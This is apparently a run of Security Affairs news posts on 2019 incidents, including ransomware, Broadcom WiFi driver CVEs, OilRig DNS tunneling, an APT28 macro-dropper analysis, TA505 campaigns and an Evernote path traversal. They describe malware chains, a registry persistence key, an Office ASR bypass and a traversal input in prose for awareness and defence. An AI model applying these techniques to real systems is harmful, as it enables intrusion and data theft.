Details are scant at the moment and a tweet from the station does not lift the haze, informing only that it was the victim of “a malicious software attack on the network.”

This morning the broadcaster transmitted a taped programming “Heavy Rescue” instead of the “AMHQ” live show.

The live show started more than 90 minutes later and the anchors informing viewers of the cyber attack. IT staff has restored the normal operations using the backups.

Weather Channel ransomware

Federal law enforcement has immediately started an investigation on the case, at the time The Weather Channel did not disclose technical details about the attack.

According to 11 Alive News, the attack was caused by ransomware, a circumstance confirmed by Feds to The Wall Street Journal. The live show was interrupted due to a ransomware attack, likely an attempt to extort money to from the broadcaster.

Ransomware attacks continue to represent a serious threat for companies and organizations, it is essential to adopt good cyber hygiene using defence software, having up to date applications and implementing an efficient backup policy.

Pierluigi Paganini

(SecurityAffairs – ransomware, Wheater Channel)




The post Ransomware attack knocks Weather Channel off the Air appeared first on Security Affairs.

Broadcom WiFi Driver bugs expose devices to hack

Experts warn of security flaws in the Broadcom WiFi chipset drivers that could allow potential attackers to remotely execute arbitrary code and to trigger DoS.

According to a DHS/CISA alert and a CERT/CC vulnerability note, Broadcom WiFi chipset drivers are affected by security vulnerabilities impacting multiple operating systems. The flaws could be exploited to remotely execute arbitrary code and to trigger a denial-of-service condition.

“The CERT Coordination Center (CERT/CC) has released information on multiple vulnerabilities in Broadcom Wi-Fi chipset drivers. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.” reads the alert published by the DHS/CISA.

“The Broadcom wl driver and the open-source brcmfmac driver for Broadcom WiFi chipsets contain multiple vulnerabilities. The Broadcom wl driver is vulnerable to two heap buffer overflows, and the open-source brcmfmac driver is vulnerable to a frame validation bypass and a heap buffer overflow.” reads the security advisory published by the CERT/CC.

The CERT/CC vulnerability note includes a list of all vendors potentially impacted by the flaws in Broadcom WiFi chipsets.

The flaws were discovered by Hugues Anguelkov during his internship at Quarkslab are tracked as CVE-2019-8564, CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, CVE-2019-9503.

The heap buffer overflows could be exploited to execute arbitrary code on vulnerable systems.

“You can find these chips almost everywhere from smartphones to laptops, smart-TVs and IoT devices. You probably use one without knowing it, for example if you have a Dell laptop, you may be using a bcm43224 or a bcm4352 card. It is also likely you use a Broadcom WiFi chip if you have an iPhone, a Mac book, a Samsumg phone or a Huawei phone, etc.” reads the post published by Anguelkov.

“Since these chips are so widespread they constitute a high value target to attackers and any vulnerability found in them should be considered to pose high risk.”

broadcom-wifi chipset

According to the CERT/CC,
In the worst case scenario, by sending specially-crafted WiFi packets, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. More typically, these vulnerabilities will result in denial-of-service attacks.
a remote and unauthenticated attackers could exploit the flaws in Broadcom WiFi chipset driver by sending maliciously-crafted WiFi packets to execute arbitrary code on vulnerable systems.

Anguelkov confirmed that two of those vulnerabilities affect both in the Linux kernel and firmware of affected Broadcom chips.

The researcher pointed out that the most common exploitation scenario leads to a remote denial of service.

“Although it is technically challenging to achieve, exploitation for remote code execution should not be discarded as the worst case scenario.” Anguelkov adds.

Below the details for the flaws:

Vulnerabilities in the open source brcmfmac driver:
• CVE-2019-9503: If the brcmfmac driver receives the firmware event frame from the host, the appropriate handler is called. It is possible to bypass frame validation by using the USB as a bus (for instance by a wifi dongle.). In this case, firmware event frames from a remote source will be processed.

CVE-2019-9500: a malicious event frame can be crafted to trigger an heap buffer overflow in the brcmf_wowl_nd_results function when the Wake-up on Wireless LAN functionality is configured. This flaw could be exploited by compromised chipsets to compromise the host, or when used in combination with the above frame validation bypass, can be used remotely.

Vulnerabilities in the Broadcom wl driver:
Two heap buffer overflows can be triggered in the client when parsing an EAPOL message 3 during the 4-way handshake from the access point (AP).
• 
CVE-2019-9501: supplying a vendor information element with a data length larger than 32 bytes, a heap buffer overflow is triggered in wlc_wpa_sup_eapol.
• 
CVE-2019-9502: If the vendor information element data length is larger than 164 bytes, a heap buffer overflow is triggered in wlc_wpa_plumb_gtk.
NOTE: When the wl driver is used with SoftMAC chipsets, these vulnerabilities are triggered in the host’s kernel. When a FullMAC chipset is being used, these vulnerabilities would be triggered in the chipset’s firmware.

The researcher published a timeline for the vulnerabilities that include information on patches released by some vendors.

Pierluigi Paganini

(SecurityAffairs – hacking, Broadcom WiFi chipset)

The post Broadcom WiFi Driver bugs expose devices to hack appeared first on Security Affairs.

Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

Many of the malware used by the group in the attacks over the years use DNS tunneling to protect communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig usage of DNS tunneling was first documented in 2016, some of the Trojans in its arsenal using it are Helminth, ISMAgent, QUADAGENT
BONDUPDATER, and ALMACommunicator.

DNS tunnelling OilRig

The analysis of the tunneling protocols used by the OilRig suggests:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools leverage DNS queries to resolve specially crafted subdomains and send data to the command and control servers. The tools use protocols in different ways, they differ for the structure of the subdomains queried, for the data received by the Trojans, for the subdomains used to transmit data.

Experts observed multiple variants of the Helminth backdoor over the years all using the same DNS Type A, but the threat actors are able to change the generated subdomains to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time.” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used the ISMAgent in many campaigns, the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting the data, the Trojan issues a beacon to inform the server it is ready.

OilRig also leveraged two variants of the ALMA Communicator in its attacks, each of them using a different domain structure. The two variants sent different information to the server and the formatted data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and QUADAGENT Trojan, the latter uses AAAA queries to transmit/receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices.” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,”

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Analyzing OilRig’s malware that uses DNS Tunneling appeared first on Security Affairs.

Drupal patched security vulnerabilities in Symfony, jQuery

The developers of the Symfony PHP web application framework released updates that patch five vulnerabilities, three affecting the Drupal CMS.

The development team of the Symfony PHP web application framework released security updates for five issues, three of which also affects Drupal 7 and 8.

The developers of the Symfony PHP web application framework addressed a total of five vulnerabilities, three of which impact the Drupal CMS.

The flaws that affect the Drupal CMS are:

drupal Symfony

The latest versions of Drupal also include security updates to address a jQuery vulnerability. The Moderately critical Cross Site Scripting flaw resides in the jQuery.extend() function.”

“It’s possible that this vulnerability is exploitable with some Drupal modules.” reads the security advisory published by Drupal. “As a precaution, this Drupal security release backports the fix to jQuery.extend(), without making any other changes to the jQuery version that is included in Drupal core (3.2.1 for Drupal 8 and 1.4.4 for Drupal 7) or running on the site via some other module such as jQuery Update,”

Drupal addressed the flaw with the release of versions 8.6.15, 8.5.15 and 7.66.

Pierluigi Paganini

(SecurityAffairs – hacking, Symfony)

The post Drupal patched security vulnerabilities in Symfony, jQuery appeared first on Security Affairs.

Facebook ‘unintentionally’ collected contacts from 1.5 Million email accounts without permission

Facebook made the headlines once again for alleged violations of the privacy of its users, this time collecting contacts from 1.5 Million email accounts without permission.

New problems for Facebook, the company collected contacts from 1.5 Million email accounts without user’permission.

We recently read about an embarrassing incident involving the social network giant that asked some newly-registered users to provide the passwords to their email accounts to confirm their identity.

Some experts speculated that the social network giant was using the password to access the email accounts and collect their contacts.

New of the day is that Facebook admitted it was collecting email contacts of some of its users.

“Facebook harvested the email contacts of 1.5 million users without their knowledge or consent when they opened their accounts. Since May 2016, the social-networking company has collected the contact lists of 1.5 million users new to the social network” reported the Business Insider.
“The Silicon Valley company said the contact data was “unintentionally uploaded to Facebook,” and it is now deleting them.”

Of course, Facebook declared that it has “unintentionally” uploaded email contacts from up to 1.5 million new users on its servers since May 2016, but the company was never authorized to do it and did not receive their consent.

Facebook passwords

This means that roughly 1.5 million users unintentionally shared passwords for their email accounts with the social network.

According to a Facebook spokesperson who spoke with Business Insider, the company was using harvested data to “build Facebook’s web of social connections and recommend friends to add.”

“At the time, it wasn’t clear what was happening — but on Wednesday, Facebook disclosed to Business Insider that 1.5 million people’s contacts were collected this way and fed into Facebook’s systems, where they were used to improve Facebook’s ad targeting, build Facebook’s web of social connections, and recommend friends to add.” continues the Business Insider.

Facebook stopped using this email verification process a month ago, when a researcher using the pseudononymous of “e-sushi” noticed that the social network was asking some users to enter their email passwords when they signed up for new accounts.

“Last month we stopped offering email password verification as an option for people verifying their account when signing up for Facebook for the first time. When we looked into the steps people were going through to verify their accounts we found that in some cases people’s email contacts were also unintentionally uploaded to Facebook when they created their account,” the spokesperson said in a statement.

“We estimate that up to 1.5 million people’s email contacts may have been uploaded. These contacts were not shared with anyone and we’re deleting them. We’ve fixed the underlying issue and are notifying people whose contacts were imported. People can also review and manage the contacts they share with Facebook in their settings.”

The list of incidents that involved the company in the last year is long. In April experts found 540 Million Facebook user records on unprotected Amazon S3 buckets.

In March 2019, Facebook admitted to having stored the passwords of hundreds of millions of users in plain text.

In October 2018, Facebook disclosed a severe security breach that allowed hackers to steal access tokens and access personal information from 29 million Facebook accounts.

Pierluigi Paganini

(Security Affairs – Facebook, privacy)

The post Facebook ‘unintentionally’ collected contacts from 1.5 Million email accounts without permission appeared first on Security Affairs.

APT28 and Upcoming Elections: evidence of possible interference (Part II)

In mid-March, a suspicious Office document referencing the Ukraine elections appeared in the wild, is it related to APT28 and upcoming elections?

Introduction

The uncertain attribution of the Ukrainian themed malicious document discussed in our past article “APT28 and Upcoming Elections: Possible Interference Signals”, led us to a review of Sofacy’s phishing techniques to confirm or deny the possible involvement of Russian state-sponsored actors in the election interference. We ended up in an old fake Hotel reservation request form, containing dummy interactive text boxes used to lure the victims to enable the macro code execution. 

We analyzed this sample two years ago and we linked it to a Sofacy attack operation discovered by FE researchers in the mid of 2017, which hit several hotels in European and Middle Eastern countries. 

Technical Analysis

Sha256a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
ThreatAPT28 GAMEFISH
Brief DescriptionGAMEFISH document dropper (reference sample, 2017)
Ssdeep1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

The macro code inside the 2017 document is password protected, just like the last suspicious document we analyzed to investigate a possible Ukraine elections interference by Russian groups. After its opening, the reference sample decodes the extracted Base64 content using a custom “DecodeBase64” function:

Figure 1: Custom Base64 decryption routine

The decoded content is actually a DLL file which is written into “%AppData%\user.dat”. After that, it will be executed through an ASR bypass technique (Attack Surface Reduction) allowing attackers to run new child process within the Office environment. This is the same publicly available exploit previously found into the Ukrainian sample (more details in the next section). 

Figure 2: Technique used to bypass Microsoft ASR protection

In this reference sample, the “user.dat”’s purpose is to create two new artifacts and to set persistence through “HKCU\Environment->UserInitMprLogonScript”. The created files are:

  • %AppData%\mrset.bat
  • %AppData%\mvtband.dat
Figure 3: Persistence setting and artifacts creation by “user.dat” file

The “mrset.bat” file is a short bash file, designed to check the “mvtband.dat” existence and to run it through “rundll32.exe” system utility.

Figure 4: “mrset.bat” file code

Finally, the “mvtband.dat” file, which actually is a Delphi DLL library, is a well-known malware named “GAMEFISH” (f9fd3f1d8da4ffd6a494228b934549d09e3c59d1). Russian groups were used to use it in recon-phases to steal information from victim machine and to implant new payloads. 

Figure 5: Information retrieved by mvtband.dll

Comparison with Ukrainian Elections Sample

Sha256 a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Threat APT28 GAMEFISH
Brief Description GAMEFISH document dropper (reference sample, 2017)
Ssdeep 1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

Despite some differences between the “Hospitality campaign” vector and the Ukraine elections one, both use similar TTP related to the APT28 group. The link between Hospitality malware and the “FancyBear” actor has been already sifted by Info-Sec community. So, we can exploit the similarities between it and the Ukrainian elections sample to link it to Russian hacker groups.

Both documents under analysis use protected macro code. All the code inside the macro is not obfuscated in any way: Hospitality document surprisingly contains code comments too. Moreover, the main macro function name is “Execute” for both documents and the ASR trick used to create new processes from the Office work-space is substantially the same.

Figure 6. The Ukraine elections macro on the left; Hospitality’s one on the right.

In both cases the real payload is encoded in Base64 and it is stored into an Office hidden section: the first sample uses a document property, the second one employs an XML resource. 

The next stages are different: the Ukraine sample deploys some Powershell obfuscated scripts, which at the end carry an Empire stager, allowing the attackers to directly interact with the victim machine; the reference sample, instead, implants the GAMEFISH malware which automatically exfiltrates victim information while waiting for new payloads to install.

Conclusion

Finally, the attribution of the Ukraine elections sample (highlighted in our previous report) can be confirmed due to the strong similarities with the first stage of the Sofacy’s Hospitality malware, because:

  • Both use password protection.
  • Both have the same function name.
  • Both have the same macro code structure.
  • Both embeds the real payload in a hidden document section.
  • The ASR trick is implemented using the same instructions.

The presence of these similarities between the droppers indicates, with high probability, the attacker is the same and consequentially suggests APT28 is reusing some 2017 tricks and code snippets which, despite their simplicity, make their attacks effective.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.
Stay Tuned.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, APT28)

The post APT28 and Upcoming Elections: evidence of possible interference (Part II) appeared first on Security Affairs.

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russianbased company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including 
the Dridex banking trojantRAT RAT, FlawedAmmy RAT, 
Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macr. The macro downloads a payload from the command and control (C&C) server, the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.

TA505

The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

Cisco addresses a critical bug in ASR 9000 series Routers

Cisco released security patches for 30 vulnerabilities, including a critical flaw in ASR 9000 Series Aggregation Services Routers running IOS XR 64-bit.

The critical vulnerability in ASR 9000 Series Aggregation Services Routers running IOS XR 64-bit is tracked as CVE-2019-1710 (CVSS score of 9.8). The flaw could be exploited by an unauthenticated, remote attacker to access internal applications running on the sysadmin virtual machine (VM).

The bug is due to the incorrect isolation of the secondary management interface from internal sysadmin applications.

“An attacker could exploit this vulnerability by connecting to one of the listening internal applications. A successful exploit could result in unstable conditions, including both a denial of service and remote unauthenticated access to the device.” reads the security advisory published by Cisco.

There are workarounds that address this issue, but Cisco recommends to install the software updates it has released to address the flaw. The tech giant has fixed the flaw in Cisco IOS XR 64-bit Software Release 6.5.3 and 7.0.1, which will edit the calvados_boostrap.cfg file and reload the device.

Cisco will not publish a software maintenance upgrade (SMU) for this vulnerability due to the effectiveness of the workaround.

CISCO-ASR-9000-2

The Cisco Product Security Incident Response Team (PSIRT) confirmed that is not aware of any attacks in the wild exploiting the issue.

Cisco also addressed 6 high-severity bugs in Inter-Access Point Protocol (IAPP) messages by Wireless LAN Controller (WLC) software, and in the administrative GUI configuration and the web-based management interface of WLC software, as well as in the phone book feature of Expressway Series and TelePresence Video Communication Server (VCS), and the development shell authentication for Aironet Series Access Points running the AP-COS operating system.

The complete list of the addressed vulnerabilities is available found on Cisco security center portal.

Pierluigi Paganini

(SecurityAffairs – hacking, CISCO ASR 9000)

The post Cisco addresses a critical bug in ASR 9000 series Routers appeared first on Security Affairs.

RCE flaw in Electronic Arts Origin client exposes gamers to hack

Electronic Arts (EA) has fixed a security issue in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts (EA) has addressed a vulnerability in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts already released a security patch for the remote code execution vulnerability. The Origin app on Windows is used by tens of millions of gamers. The Origin client for macOS was not affected by this flaw.

The flaw was reported by security experts Dominik Penner and Daley Bee from Underdog Security.

“We located a client-sided template injection, where we proceeded to use an AngularJS sandbox escape and achieve RCE by communicating with QtApplication’s QDesktopServices.” reads a blog post published by
Underdog Security.

“To make it easier to access an individual game’s store from the web, the client has its own URL scheme that allows gamers to open the app and load a game from a web page by clicking a link with origin:// in the address.” reported Techcrunch.

“But two security researchers, Daley Bee and Dominik Penner of Underdog Security, found that the app could be tricked into running any app on the victim’s computer.”

The experts shared a proof-of-concept code with Techcrunch to trigger the issue.

Researchers pointed out that the code allowed any app to run at the same level of privileges as the logged-in user. In the following image, the security duo popped open the Windows calculator remotely.

Electronic Arts Origin client

“But worse, a hacker could send malicious PowerShell commands, an in-built app often used by attackers to download additional malicious components and install ransomware.” continues the post.

An attacker could craft a malicious link and send it via email to the victims or include it on a webpage, the issue could also be triggered if the malicious code was combined with cross-site scripting exploit that ran automatically in the browser.

The flaw can also be exploited by an attacker to take over gamers’ accounts by stealing access token with just a single line of code.

Pierluigi Paganini

(SecurityAffairs – hacking, Electronic Arts)

The post RCE flaw in Electronic Arts Origin client exposes gamers to hack appeared first on Security Affairs.

Code execution – Evernote

A local file path traversal issue exists in Evernote 7.9 for macOS which allows an attacker to execute arbitrary programs.

Technical observation:
A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like
(../../../../something.app).

Since Evernote also has a feature of sharing notes, in such a case an attacker could leverage this vulnerability and send crafted notes (.enex) to the victim to perform further attacks.

Evernote

Patch: 
A patch for this issue was released in Evernote 7.10 Beta 1 and 7.9.1 GA for macOS [MACOSNOTE-28840]. CVE-2019-10038 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)

Original post at:

https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html

Pierluigi Paganini

(Security Affairs – Evernote, hacking)

The post Code execution – Evernote appeared first on Security Affairs.

Justdial is leaking personal details of all customers real-time

A database belonging to the Indian local search service JustDial was left online without protection exposing personal data of over 100M users.

The archive is still leaking personally identifiable information of more than JustDial customers that are accessing the service via its website, mobile app, or even by calling on the customer care number (“88888 88888”).

The news was first reported by The Hacker News that independently verified the authenticity of the story.

JustDial is the largest and oldest search engine in India that allows its users to find vendors of various products and services.

The independent researcher Rajshekhar Rajaharia discovered how an unprotected, publicly accessible API endpoint of JustDial’s database can be accessed by anyone.

The leaked data includes username, email, mobile number, address, gender, date of birth, photo, occupation, company name and other.

According to the expert, data remained exposed since at least mid-2015 through unprotected API, at the time it is not clear if anyone had accessed the huge trove of data.

justdial data-breach-hacking

Experts at THN provided Rajshekhar a new phone number that was never before registered with Justdial server, then used it to contact the JustDial service and request information on restaurants, The service created a profile and associated it with the number provided by THN. Rajshekhar was able to access the profile a circumstance that confirmed that expose DB was the one associated with production systems.

“Although the unprotected API is connected to the primary JD database, Rajshekhar revealed that it’s an old API endpoint which is not currently being used by the company but left forgotten on the server.” reads the post published by THN.

Rajshekhar discovered this unprotected end-point while conducting a penetration test on the latest APIs, which are apparently protected.

Rajshekhar also found other issued associated with old unprotected APIs, one of them could be exploited by anyone to trigger OPT request for any registered phone number making possible to spam users.

Rajshekhar attempted to report the issues to the company but without success.

Pierluigi Paganini

(SecurityAffairs – hacking, JustDial)

The post Justdial is leaking personal details of all customers real-time appeared first on Security Affairs.

European Commission is not in possession of evidence of issues with Kaspersky products

The European Commission confirmed that has no evidence of issues associated with using products designed by Kaspersky Lab.

In June 2018, European Parliament passed a resolution that classified the security firm’s software as “malicious” due to the alleged link of the company with the Russian intelligence.

The call for a ban on Kaspersky’s software among the members of the European Union was part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

“Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.” stated the report.

The European eurocrats adopted the A8-0189/2018 motion that could ban the products of the security giant from European Union institutions.

Kaspersky was accused of working for the Russian intelligence, many EU states including the U.K., the Netherlands and Lithuania banned its products.

In response to a March 2019 inquiry from Gerolf Annemans, European Parliament member from Belgium, the European Commission confirmed that it is not aware of problems with the products of Kaspersky Lab.

Citing the experience of Germany, France, and Belgium, that never found any issues with the use of Kaspersky Lab solutions, Annemans asked further clarifications to the European Commission.

APT28 EU

Annemans asked it the European Commission knows “any reason other than certain press articles that justifies the labelling of Kaspersky as ‘dangerous’ or ‘malicious’.”

He asked for technical proof of problems and “any reports or opinions of cyber experts or consultancies about Kaspersky Lab.”

“The Commission is not in possession of any evidence regarding potential issues related to the use of Kaspersky Lab products.” reads the response of the Commission. “The Commission is following closely debates and developments concerning the security of IT products and devices in general, including discussions about potential measures related to access to the EU market.”

“Regarding reports or opinions published concerning the issue raised by the Honourable Member, the Commission did not commission any reports,”

Pierluigi Paganini

(SecurityAffairs – European Commission, Kaspersky Lab)

The post European Commission is not in possession of evidence of issues with Kaspersky products appeared first on Security Affairs.